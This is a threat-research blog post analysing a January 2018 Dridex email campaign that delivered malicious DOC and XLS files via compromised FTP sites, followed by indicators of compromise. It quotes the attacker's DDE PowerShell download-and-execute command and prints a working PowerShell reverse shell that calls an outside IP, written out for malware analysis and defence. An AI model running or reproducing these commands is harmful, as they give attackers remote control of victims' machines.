You are here

Home:Blogs:New year, new look - Dridex via compromised FTP
X-Labs
January 18, 2018

New year, new look - Dridex via compromised FTP

Roland Dela Paz Security Researcher
Ran Mosessco Principal Security Researcher
Botnet Malware

Forcepoint Security Labs have recently observed a peculiar email campaign distributing a variant of the Dridex banking trojan. The campaign used compromised FTP sites instead of the more usual HTTP link as download locations for malicious documents, exposing the credentials of the compromised FTP sites in the process.

The malicious emails were distributed just before 12:00 UTC on 17 January 2018 and remained active for approximately seven hours. The emails were sent primarily to .COM top level domains (TLDs) with the second, third and fourth top affected TLDs suggesting that major regional targets were France, the UK, and Australia respectively:

The sender domains used are observed to be compromised accounts. The sender names rotated around the following names, perhaps to make the emails look more convincing to unsuspecting recipients:

admin@
billing@
help@
info@
mail@
no-reply@
sale@
support@
ticket@

Below is a sample malicious email:

The campaign used two types of documents. The first is a DOC that abuses DDE to execute the following shell command to download malware:

c:\Windows\system32\cmd.exe /k Echo Microsoft Office Document YES && pow^ers^hell.e^xe -W hidden -Exec Bypass -nologo -noprofile -c IEX(New-Object Net.WebClient).DownloadString('http://185.176.221[.]146/download/s/GTz')

The above link downloads a B64 encoded string that decodes to the following download code:

while (1 -eq 1)
 {
   try
   {
     $ErrorActionPreference = 'Continue';
     $zcl=New-Object Net.Sockets.TCPClient("185.176.221.146",443);
     $zm=($zcl.GetStream());
     [byte[]]$bt=0..255|%
     {
       0
     };
     while(($i=$zm.Read($bt,0,$bt.Length)) -ne 0)
       $d=(New-Object Text.ASCIIEncoding).GetString($bt,0,$i);
       $st= ([text.encoding]::ASCII).GetBytes((iex $d 2>&1));
       $zm.Write($st,0,$st.Length);
       $zm.Flush()
     }
   }
   catch
     Start-Sleep -s 10;
     if($zcl.Connected)
       $zcl.Close();
 }

The second type is a XLS file with a Macro that downloads Dridex from the following location:

hxxp://theairlab[.]co.za/KJHdey3

It is then executed using the following command:

cmd.exe /c START "" C:\Users\<redacted>\AppData\Local\Temp\vanilaice8.exe

Analysis

The compromised servers do not appear to be running the same FTP software; as such, it seems likely that the credentials were compromised in some other way.

The perpetrators of the campaign do not appear to be worried about exposing the credentials of the FTP sites they abuse, potentially exposing the already-compromised sites to further abuse by other groups. This may suggest that the attackers have an abundant supply of compromised accounts and therefore view these assets as disposable. Equally, if a compromised site is used by multiple actors it also makes attribution harder for security professionals and law enforcement.

Multiple attributes of the campaign suggest that it may coming from the Necurs botnet:

  • The domains used for distribution were already in our records as compromised domains used in previous Necurs campaigns;
  • Necurs is historically known to spread Dridex;
  • The document downloaders are also similar to those used by Necurs in the past;
  • The download locations of the XLS file also follows the traditional Necurs format.

However, the volume of this particular campaign is very low compared to typical Necurs campaigns. Necurs typically sends out millions of emails per campaign, while this campaign was recorded sending just over 9.5K emails in total. Necurs has recently been recorded using malicious links (as opposed to malicious attachments) to distribute Dridex, but the switch to FTP-based download URLs is an unexpected change.

Protection statement

Forcepoint customers are protected against this threat at the following stages of attack:

Stage 2 (Lure) - Malicious e-mails associated with this attack are identified and blocked.
Stage 5 (Dropper File) - Mallicious files are prevented from being downloaded.
Stage 6 (Call Home) - Attempts by Dridex to contact its C&C server are blocked.

Conclusion

Cybercriminals constantly update their attack methods to try and ensure maximum infection rates. In this case FTP sites were used, perhaps in an attempt to prevent being detected by email gateways and network policies that may consider FTPs as trusted locations. The presence of FTP credentials in the emails highlights the importance of regularly updating passwords: a compromised account may be abused multiple times by different actors as long as the credentials remain the same.

Although there are attributes of the campaign that suggest it is coming from Necurs, the size of the campaign is more or less 'average'. Given Necurs' typical association with very large campaigns, the reason for this remains something of a mystery.

Forcepoint Security Labs will continue to monitor for similar campaigns in the future and update information here as necessary.

Indicators of Compromise

FTP URLs:

ftp://{redacted}:{redacted}@www.emtech-canada[.]com/docs
ftp://{redacted}:{redacted}@basedow-bilder[.]de/httpdocs/docs
ftp://{redacted}:{redacted}@charter-base[.]de/httpdocs/docs
ftp://{redacted}:{redacted}@peopleiknow[.]org/httpdocs/docs
ftp://{redacted}:{redacted}@schwellenwertdaten[.]de/httpdocs/docs/
ftp://{redacted}:{redacted}@motifahsap[.]com/httpdocs/docs
ftp://{redacted}:{redacted}@basedow-bilder[.]de/httpdocs/docs/scan_17.01.doc
ftp://{redacted}:{redacted}@www.emtech-canada[.]com/docs/scan_17.01.doc
ftp://{redacted}:{redacted}@motifahsap[.]com/httpdocs/docs/scan_17.01.doc
ftp://{redacted}:{redacted}@charter-base[.]de/httpdocs/docs/scan_17.01.xls
ftp://{redacted}:{redacted}@basedow-bilder[.]de/httpdocs/docs/scan_17.01.xls
ftp://{redacted}:{redacted}@www.emtech-canada[.]com/docs/scan_17.01.xls
ftp://{redacted}:{redacted}@charter-base[.]de/httpdocs/docs/scan_17.01.doc
ftp://{redacted}:{redacted}@motifahsap[.]com/httpdocs/docs/scan_17.01.xls
ftp://{redacted}:{redacted}@schwellenwertdaten[.]de/httpdocs/docs/scan_17.01.doc
ftp://{redacted}:{redacted}@schwellenwertdaten[.]de/httpdocs/docs/scan_17.01.xls
ftp://{redacted}:{redacted}@peopleiknow[.]org/httpdocs/docs/scan_17.01.xls
ftp://{redacted}:{redacted}@peopleiknow[.]org/httpdocs/docs/scan_17.01.doc

XLS macro (SHA1):

5697b0e3123b7d9511568d153e5545eb0ec5c906
a1843ecc6f0c3f3fe0a3ef13d81d69abfaf6d4c9
7b7cdd64f0e66776303b4c09eefbac23471a58f1

DOC DDE abuse (SHA1):

e6347d6245308e104a1f4225cdd2c814cff1a63a

Dridex download locations:

theairlab[.]co.za/KJHdey3
185.176.221[.]146

Dridex (SHA1):

23b84ed99d9761ce4ffdf928e472ee03afb3615f

Dridex C2s:

69.90.132[.]196:443
89.171.146[.]30:4143
108.166.114[.]38:4443
138.197.255[.]18:4143
RD

Roland Dela Paz

Security Researcher
Read more articles by Roland Dela Paz
RM

Ran Mosessco

Principal Security Researcher
Read more articles by Ran Mosessco

About Forcepoint

Forcepoint is the leading user and data protection cybersecurity company, entrusted to safeguard organizations while driving digital transformation and growth. Our solutions adapt in real-time to how people interact with data, providing secure access while enabling employees to create value.
Learn more about Forcepoint